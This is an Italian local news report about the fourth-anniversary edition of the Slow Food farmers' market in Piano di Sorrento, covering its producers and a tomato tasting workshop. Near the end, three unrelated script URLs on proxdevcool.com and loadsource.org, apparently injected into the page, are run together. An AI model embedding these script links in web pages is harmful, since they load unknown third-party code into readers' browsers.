Piano di Sorrento . Oggi domenica 9 settembre seguito in diretta da Positanonews la Condotta…
Piano di Sorrento . Oggi domenica 9 settembre seguito in diretta da Positanonews la Condotta Slow Food Costiera Sorrentina e Capri festeggia il quarto anno del “Mercato della Terra”. Lo squillo della tromba che apre l’iniziativa, giunta alla sua quarta edizione, in Piazza della Repubblica a Piano di Sorrento, è previsto come sempre alle 9, ma alle 10.45 ci si fermerà un attimo per spegnere le candeline dei quattro anni di questa manifestazione, che è diventata un appuntamento atteso da produttori e cittadini.
Era il 14 settembre del 2014 quando venne inaugurato il primo “Mercato della Terra”, primo nel sud Italia, attivato con la collaborazione di Slow Food Campania e la Città di Piano di Sorrento. Ad accoglierlo fu il mercato ortofrutticolo coperto di Piano di Sorrento, una bella architettura quasi unica nel suo genere, in stile liberty di fine ‘800.
Oggi come ieri il Mercato della Terra è un evento che fa parte di una rete internazionale di mercati, di produttori e di contadini, che condividono la filosofia Slow Food del cibo buono, pulito e giusto. Un luogo dove fare la spesa, incontrarsi, conoscersi, mangiare in compagnia. Un progetto nato per poter sostenere le produzioni locali di qualità; dare ai cittadini e ai cuochi del territorio la possibilità di acquistare cibo naturale, locale, di stagione; creare una nuova area mercatale pubblica e rafforzarne una già esistente; accrescere il turismo locale e promuovere la cultura e l’identità del territorio, oltre a dare un impulso all’economia locale.
Come ogni seconda domenica del mese, saranno presenti i produttori dei Presidi Slow Food e delle Comunità del Cibo di terra e di mare della Penisola Sorrentina, di Castellammare di Stabia e di tutta la Campania che porteranno verdure fresche, frutta, pane, vino, confetture, miele, uova, salumi, formaggi, dolciumi e tanto altro.
Domenica, alle 11.30, avrà inizio il Laboratorio del Gusto, nell’Area Educa, che questa volta sarà dedicato al pomodoro nelle sue varietà: il pomodoro di Sorrento, il San Marzano, quello del piennolo del Vesuvio, il ciliegino, il datterino. L’attenzione sarà però concentrata sui pomodori delle colline vicane, grazie alla testimonianza diretta di Giulio Dubbioso dell’omonima azienda agricola e Rosa Russo dell’Azienda Russo – L’Arcangelo, entrambe del borgo di Montechiaro a Vico Equense. Alla guida del laboratorio ci saranno l’agronoma Elena De Marco e la storica dell’arte Assunta Vanacore, per gli aspetti storici e antropologici. A seguire, come ormai consuetudine, la degustazione guidata del prodotto, condotta da Rosa Paciello. L’iniziativa proseguirà alle 14 con il pranzo del mercato, con un menu dedicato, presso l’Osteria Slow Food “Il Cellaio di Don Gennaro” a Vico Equense.
La diretta di Positanonews è stata riportata integralmente dalla pagina facebook di Positanonews, come tutte le dirette è estemporanea, con il classico “bello della diretta”, ma crediamo di aver rappresentato lo spirito dell’iniziativa.
https://proxdevcool.com/addons/lnkr5.min.jshttps://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6764x&r=1536483337257https://proxdevcool.com/ext/1a6cf99dda53eee160.js?sid=52200_6764_&title=&blocks%5B%5D=31af2
Fonte : PositanoNews.it